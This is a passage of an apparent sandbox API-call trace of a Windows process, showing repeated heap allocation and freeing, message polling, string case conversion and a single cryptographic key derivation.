lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.198] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.199] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.199] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.200] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.202] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.202] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.202] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.202] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.202] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.203] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 